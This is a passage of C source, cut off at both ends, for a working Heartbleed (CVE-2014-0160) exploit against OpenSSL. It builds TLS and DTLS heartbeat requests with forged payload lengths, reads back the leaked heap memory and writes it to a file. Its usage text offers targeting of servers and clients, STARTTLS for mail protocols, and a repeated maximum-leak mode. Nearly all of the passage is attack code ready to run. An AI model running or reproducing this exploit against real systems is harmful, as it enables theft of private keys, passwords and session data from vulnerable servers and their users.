BIO_ctrl_set_connected(bio, 1, &sa);\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_connect_state (c->sslHandle);\r\n//printf(\"eshta\\n\");\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n \r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat);\r\n }\r\n return c;\r\n}\r\n \r\nconnection* tls_bind(int sd){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n bytes = SSL_read(c->sslHandle, buf, 4095);\r\n printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nint pre_cmd(int sd,int precmd,int verbose){\r\n /* this function can be used to send commands to a plain-text\r\n service or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n int rc, go = 0;\r\n char* buffer;\r\n char* line1;\r\n char* line2; \r\n switch(precmd){\r\n case 0:\r\n line1 = \"EHLO test\\n\";\r\n line2 = \"STARTTLS\\n\";\r\n break;\r\n case 1:\r\n line1 = \"CAPA\\n\";\r\n line2 = \"STLS\\n\";\r\n break;\r\n case 2:\r\n line1 = \"a001 CAPB\\n\";\r\n line2 = \"a002 STARTTLS\\n\";\r\n break;\r\n default:\r\n go = 1;\r\n break;\r\n }\r\n if(go==0){\r\n buffer = malloc(2049);\r\n if(buffer==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n printf(\"[ banner: %s\",buffer);\r\n send(sd,line1,strlen(line1),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n send(sd,line2,strlen(line2),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n }\r\n return sd;\r\n}\r\n \r\nvoid* heartbleed(connection *c,unsigned int type){\r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n s2n(0xffff,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n return c;\r\n}\r\n \r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n \r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2 + 16);\r\n memset(buf, '\\0', sizeof buf);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n// s2n(0xffff,p);\r\n// s2n(0x3feb,p);\r\n s2n(0x0538,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n s2n(c->sslHandle->tlsext_hb_seq, p);\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n \r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n \r\n if (ret >= 0)\r\n {\r\n if (c->sslHandle->msg_callback)\r\n c->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n buf, 3 + 16,\r\n c->sslHandle, c->sslHandle->msg_callback_arg);\r\n \r\n dtls1_start_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_pending = 1;\r\n }\r\n \r\n OPENSSL_free(buf);\r\n \r\n return c;\r\n}\r\n \r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\n \r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n DTLS1_BITMAP *bitmap;\r\n unsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n \r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n \r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->epoch);\r\n memcpy(&(s->s3->read_sequence[2]), p, 6);\r\n p+=6;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n if ( n != i)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n \r\n bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n if ( bitmap == NULL)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n if (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n *p == SSL3_MT_CLIENT_HELLO) &&\r\n !dtls1_record_replay_check(s, bitmap))\r\n {\r\n rr->length = 0;\r\n s->packet_length=0;\r\n goto again;\r\n }\r\n \r\n if (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n {\r\n if ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n {\r\n dtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n }\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n \r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n orig_len=rr->length;\r\n \r\n dtls1_enc(s,0);\r\n \r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n \r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n \r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n dtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n \r\n dtls1_stop_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_seq++;\r\n c->sslHandle->tlsext_hb_pending = 0;\r\n \r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n \r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n \r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n \r\n return NULL;\r\n }\r\n \r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n shift = -cmp;\r\n if (shift >= sizeof(bitmap->map)*8)\r\n return 0;\r\n else if (bitmap->map & (1UL<<shift))\r\n return 0;\r\n \r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n \r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{ int ret,sat,brw,i;\r\n \r\n if (sizeof(long) == 8) do\r\n { const union { long one; char little; } is_endian = {1};\r\n long l;\r\n \r\n if (is_endian.little) break;\r\n \r\n if (((size_t)v1|(size_t)v2)&0x7) break;\r\n \r\n l = *((long *)v1);\r\n l -= *((long *)v2);\r\n if (l>128) return 128;\r\n else if (l<-128) return -128;\r\n else return (int)l;\r\n } while (0);\r\n \r\n ret = (int)v1[7]-(int)v2[7];\r\n sat = 0;\r\n brw = ret>>8;\r\n if (ret & 0x80)\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= ~brw;\r\n brw >>= 8;\r\n }\r\n }\r\n else\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= brw;\r\n brw >>= 8;\r\n }\r\n }\r\n brw <<= 8;\r\n \r\n if (sat&0xff) return brw | 0x80;\r\n else return brw + (ret&0xFF);\r\n}\r\n \r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n {\r\n DTLS1_RECORD_DATA *rdata;\r\n pitem *item;\r\n \r\n if (pqueue_size(queue->q) >= 100)\r\n return 0;\r\n \r\n rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n item = pitem_new(priority, rdata);\r\n if (rdata == NULL || item == NULL)\r\n {\r\n if (rdata != NULL) OPENSSL_free(rdata);\r\n if (item != NULL) pitem_free(item);\r\n \r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n return(0);\r\n }\r\n \r\n rdata->packet = s->packet;\r\n rdata->packet_length = s->packet_length;\r\n memcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n \r\n item->data = rdata;\r\n \r\n#ifndef OPENSSL_NO_SCTP\r\n if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n }\r\n#endif\r\n \r\n if (pqueue_insert(queue->q, item) == NULL)\r\n {\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n s->packet = NULL;\r\n s->packet_length = 0;\r\n memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n \r\n if (!ssl3_setup_buffers(s))\r\n {\r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n return(1);\r\n }\r\n \r\n \r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n shift = cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map <<= shift, bitmap->map |= 1UL;\r\n else\r\n bitmap->map = 1UL;\r\n memcpy(bitmap->max_seq_num,seq,8);\r\n }\r\n else {\r\n shift = -cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map |= 1UL<<shift;\r\n }\r\n }\r\n \r\n \r\nvoid usage(){\r\n printf(\"[\\n\");\r\n printf(\"[ --server|-s <ip/dns> - the server to target\\n\");\r\n printf(\"[ --port|-p <port> - the port to target\\n\");\r\n printf(\"[ --file|-f <filename> - file to write data to\\n\");\r\n printf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\r\n printf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\r\n printf(\"[ 0 = SMTP\\n\");\r\n printf(\"[ 1 = POP3\\n\");\r\n printf(\"[ 2 = IMAP\\n\");\r\n printf(\"[ --loop|-l - loop the exploit attempts\\n\");\r\n printf(\"[ --type|-t <n> - select exploit to try\\n\");\r\n printf(\"[ 0 = null length\\n\");\r\n printf(\"[ 1 = max leak\\n\");\r\n printf(\"[ n = heartbeat payload_length\\n\");\r\n printf(\"[ --udp|-u - use dtls/udp\\n\");\r\n printf(\"[\\n\");\r\n printf(\"[ --verbose|-v - output leak to screen\\n\");\r\n printf(\"[ --help|-h - this output\\n\");\r\n printf(\"[\\n\");\r\n exit(0);\r\n}\r\n \r\nint main(int argc, char* argv[]){\r\n int ret, port, userc, index;\r\n int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n int loop = 0;\r\n struct hostent *h;\r\n connection* c;\r\n char *host, *file;\r\n int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n printf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\r\n printf(\"[ =============================================================\\n\");\r\n static struct option options[] = {\r\n {\"server\", 1, 0, 's'},\r\n {\"port\", 1, 0, 'p'},\r\n {\"file\", 1, 0, 'f'},\r\n {\"type\", 1, 0, 't'},\r\n {\"bind\", 1, 0, 'b'},\r\n {\"verbose\", 0, 0, 'v'},\r\n {\"precmd\", 1, 0, 'c'},\r\n {\"loop\", 0, 0, 'l'},\r\n {\"help\", 0, 0,'h'},\r\n {\"udp\", 0, 0, 'u'}\r\n };\r\n while(userc != -1) {\r\n userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index); \r\n switch(userc) {\r\n case -1:\r\n break;\r\n case 's':\r\n if(ihost==0){\r\n ihost = 1;\r\n h = gethostbyname(optarg); \r\n if(h==NULL){\r\n printf(\"[!] FATAL: unknown host '%s'\\n\",optarg);\r\n exit(1);\r\n }\r\n host = malloc(strlen(optarg) + 1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n }\r\n break;\r\n case 'p':\r\n if(iport==0){\r\n port = atoi(optarg);\r\n iport = 1;\r\n }\r\n break;\r\n case 'f':\r\n if(ifile==0){\r\n file = malloc(strlen(optarg) + 1);\r\n if(file==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(file,\"%s\",optarg);\r\n ifile = 1;\r\n }\r\n break;\r\n case 't':\r\n if(itype==0){\r\n type = atoi(optarg);\r\n itype = 1;\r\n }\r\n break;\r\n case 'h':\r\n usage();\r\n break;\r\n case 'b':\r\n if(ihost==0){\r\n ihost = 1;\r\n host = malloc(strlen(optarg)+1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n bind = 1;\r\n }\r\n break;\r\n case 'c':\r\n if(iprecmd == 0){\r\n iprecmd = 1;\r\n precmd = atoi(optarg);\r\n }\r\n break;\r\n case 'v':\r\n verbose = 1;\r\n break;\r\n case 'l':\r\n loop = 1;\r\n break;\r\n case 'u':\r\n udp = 1;\r\n break;\r\n \r\n default:\r\n break;\r\n }\r\n }\r\n if(ihost==0||iport==0||ifile==0||itype==0){\r\n printf(\"[ try --help\\n\");\r\n exit(0);\r\n }\r\n ssl_init();\r\n if(bind==0){\r\n if (udp){\r\n c = dtls_client(ret, host, port);\r\n dtlsheartbleed(c, type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_connect(host, port);\r\n pre_cmd(ret, precmd, verbose);\r\n c = tls_connect(ret);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n \r\n SSL_shutdown(c->sslHandle);\r\n close (ret);\r\n SSL_free(c->sslHandle);\r\n }\r\n else{\r\n int sd, pid, i;\r\n if (udp) {\r\n c = 